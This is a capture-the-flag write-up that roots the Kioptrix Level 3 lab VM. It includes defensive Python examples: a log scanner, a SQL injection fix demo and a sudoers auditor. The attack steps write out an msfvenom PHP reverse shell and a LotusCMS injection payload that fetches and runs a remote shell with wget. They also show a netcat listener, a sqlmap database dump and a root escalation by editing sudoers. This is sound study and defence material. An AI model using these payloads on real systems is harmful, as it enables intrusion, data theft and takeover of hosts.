This is my writeup for the Kioptrix Level 3 VM from vulnhub.com. It's considered easy. The object of the game is to acquire root access via any means possible. There are more ways than one to successfully complete the challenges.
When scanning the host with nmap we find two open ports:
- 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 12:06 EDT
Nmap scan report for 192.168.254.168
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:F1:E7:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds
Accessing the host at port 80 we get a web app:
When inspecting the source code, we can find LotusCMS in the meta-tag keywords.
There seems to be a Remote Command Execution vulnerability in this CMS.
If we try to access the gallery link, the page is not rendered correctly. This is because the assets can't be loaded due to the fixed base href. If one reads the description, there is a hint:
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
So let's create a hosts-entry:
$ echo "__IP__ kioptrix3.com" >> /etc/hosts
When looking at the meta-tag generator we can see Gallarific, which seems to be a gallery web app.
Let's check searchsploit to see whether there are any known vulnerabilities.
We try to get a shell using the Remote Command Execution:
Create a shell:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=__IP__ LPORT=__PORT__ -f raw > shell.php
Upload the shell:
kioptrix3.com/index.php?page=index');shell_exec('wget http://__IP__/php_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php');//
$ nc -nvlp 42
Kick the shell:
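From the defender's side, the request used in the step above leaves a clear trace in the web server's access log: the page parameter stops looking like a page name and starts looking like PHP. The script below is an added example, not code from the writeup, from LotusCMS or from Gallarific. It scans Apache combined-format log lines and flags a page value that steps outside the slug alphabet a page name needs or that names a PHP execution function. The log lines are constructed, and the assumption that a legitimate page name is a plain slug is mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines for the demo (not a real capture).
SAMPLE_LOG = r'''
10.0.0.5 - - [15/Oct/2017:12:10:01 -0400] "GET /index.php?page=index HTTP/1.1" 200 2431 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Oct/2017:12:10:09 -0400] "GET /gallery/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2017:12:11:44 -0400] "GET /index.php?page=index%27%29%3Bshell_exec%28%27id%27%29%3B%2F%2F HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Oct/2017:12:12:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 1988 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Apache combined log: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: a legitimate LotusCMS page name is a plain slug (letters, digits, _ - /).
PAGE_NAME_OK = re.compile(r"^[A-Za-z0-9_\-/]*$")
# Function names that have no business inside a page name.
PHP_EXEC_FUNCS = re.compile(
    r"\b(?:shell_exec|system|passthru|exec|popen|proc_open|eval)\b", re.IGNORECASE
)


def analyse_page_param(path):
    """Return the reasons a request's page parameter looks like code injection ([] if clean)."""
    query = urlsplit(path).query
    reasons = []
    for value in parse_qs(query, keep_blank_values=True).get("page", []):
        # parse_qs has already percent-decoded once; a double-encoded payload
        # still fails the slug check because '%' is not in the allowed set.
        if not PAGE_NAME_OK.match(value):
            reasons.append("page value contains characters outside the page-name alphabet")
        if PHP_EXEC_FUNCS.search(value):
            reasons.append("page value names a PHP execution function")
    return reasons


def scan_log(lines):
    """Return one dict per suspicious request with ip, timestamp, path and reasons."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = analyse_page_param(m.group("path"))
        if reasons:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": m.group("path"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The slug check does the real work: it fires on any quote, parenthesis or semicolon regardless of which PHP function follows, so it also catches payloads that avoid the listed function names. The function-name check is there to give the analyst a second, more specific signal.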
Let's try the SQL injection from the searchsploit list.
To exploit an SQL injection, we use sqlmap:
TODO: It came to my attention, that sqlmap is forbidden as well. Do this manually.
$ sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --random-agent --level 5 --risk 3 -D gallery --dump
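The searchsploit entry used above is a SQL injection in the gallery's id parameter. As an added example, not code from the writeup, from Gallarific or from sqlmap, the following Python/sqlite3 model shows the same class of bug next to its fix: the unsafe lookup pastes the request value into the SQL text, while the hardened lookup validates the type and binds the value as a parameter. The table, its rows and the private flag are constructed for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed in-memory gallery table (not data from the Kioptrix VM)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, private INTEGER)")
    conn.executemany(
        "INSERT INTO photos VALUES (?, ?, ?)",
        [(1, "beach", 0), (2, "office", 0), (3, "payroll scan", 1)],
    )
    return conn


def lookup_unsafe(conn, photo_id):
    """Vulnerable pattern: the request value becomes part of the SQL text.

    A value such as '3 OR 1=1' turns the WHERE clause into
    'id = 3 OR (1=1 AND private = 0)', so the private row is returned as well.
    """
    sql = f"SELECT id, title FROM photos WHERE id = {photo_id} AND private = 0 ORDER BY id"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, photo_id):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The driver sends the value separately from the statement, so it can never
    change the query's structure; the int() check additionally rejects anything
    that is not a plain numeric id before it reaches the database at all.
    """
    try:
        photo_id = int(photo_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT id, title FROM photos WHERE id = ? AND private = 0 ORDER BY id",
        (photo_id,),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("unsafe, normal input :", lookup_unsafe(db, "1"))
    print("unsafe, injected     :", lookup_unsafe(db, "3 OR 1=1"))
    print("safe, normal input   :", lookup_safe(db, "1"))
    try:
        lookup_safe(db, "3 OR 1=1")
    except ValueError as exc:
        print("safe, injected       : rejected ->", exc)
```

Parameter binding alone would already stop the injection; the explicit int() conversion is added because an id column that only ever receives integers should never see anything else, and rejecting early gives the application a clean place to log the attempt.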
A common mistake people make is reusing passwords. In this case loneferret uses the same password for Gallarific and SSH, which allows us to log in to the box.
We're on the box but with limited access. Next step is to escalate our privileges.
CompanyPolicy.README which is located in loneferret's home directory looks interesting.
The CEO orders users to use sudo ht to view, edit or create files.
What is HT Editor?
This program is a file viewer, editor and analyzer for text, binary, and (especially) executable files.
setuid and setgid (short for "set user ID upon execution" and "set group ID upon execution", respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group respectively and to change behaviour in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.
setuid and setgid are needed for tasks that require higher privileges than those which common users have, such as changing their login password.
In this case that means we can view, edit or create any file as root.
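The root cause here is a sudoers rule that hands a file editor to a user as root. The script below is an added example, not part of the writeup and not the VM's real configuration: it parses simple sudoers rules and flags entries that amount to root access, namely ALL, editors and pagers (which read and write arbitrary files when run as root), and negated commands, which sudoers(5) itself documents as not being a reliable restriction. The sudoers excerpt and the user names are constructed; the rule grammar handled is a simplified one (one rule per line, no aliases).

```python
import os
import re

# Constructed sudoers excerpt for the demonstration; it is not the VM's real file.
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL) ALL
alice   ALL=(ALL) NOPASSWD: !/bin/su, /usr/local/bin/ht
bob     ALL=(root) /usr/bin/systemctl restart nginx
carol   ALL=(ALL) /usr/bin/vim /etc/hosts
%admin  ALL=(ALL) ALL
""".strip().splitlines()

# Editors, pagers and viewers: run as root they read or write any file, so
# listing one of them in sudoers is equivalent to granting root.
EDITOR_LIKE = {"ht", "vi", "vim", "view", "nano", "emacs", "ed", "less", "more"}

# user  host = (runas) [TAG:] cmd, cmd ...   (simplified: one rule per line, no aliases)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # strips NOPASSWD:, SETENV:, ...


def audit_sudoers(lines):
    """Return a list of {'user', 'command', 'reason'} dicts for risky entries."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # alias definitions and continuation lines are out of scope
        user = m.group("user")
        if user == "root":
            continue  # root may run everything anyway
        for cmd in m.group("cmds").split(","):
            cmd = TAG_RE.sub("", cmd.strip())
            if cmd == "ALL":
                findings.append({"user": user, "command": cmd,
                                 "reason": "unrestricted root"})
            elif cmd.startswith("!"):
                findings.append({"user": user, "command": cmd,
                                 "reason": "negated command: sudoers(5) documents that "
                                           "'!' exclusions are not a reliable restriction"})
            else:
                binary = os.path.basename(cmd.split()[0])
                if binary in EDITOR_LIKE:
                    findings.append({"user": user, "command": cmd,
                                     "reason": f"{binary} run as root reads and writes arbitrary files"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']:8} {f['command']:32} {f['reason']}")
```

Note that carol's entry is flagged even though the editor is pinned to one argument: an interactive editor run as root can open other files from inside the session, so restricting the command line does not restrict what it can touch. The fix is to grant a narrow, non-interactive command instead (bob's entry is the shape to aim for).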
Let's try to edit /etc/sudoers.
$ sudo ht -t /etc/sudoers (-t for text editor mode)
If we remove the exclamation mark and change the path to /bin/su, we would be allowed to run /bin/su via sudo, which would make us root.
$ sudo ht -t /etc/sudoers
Edit the file and press ctrl+w
Let's try to run su:
And finally read the flag: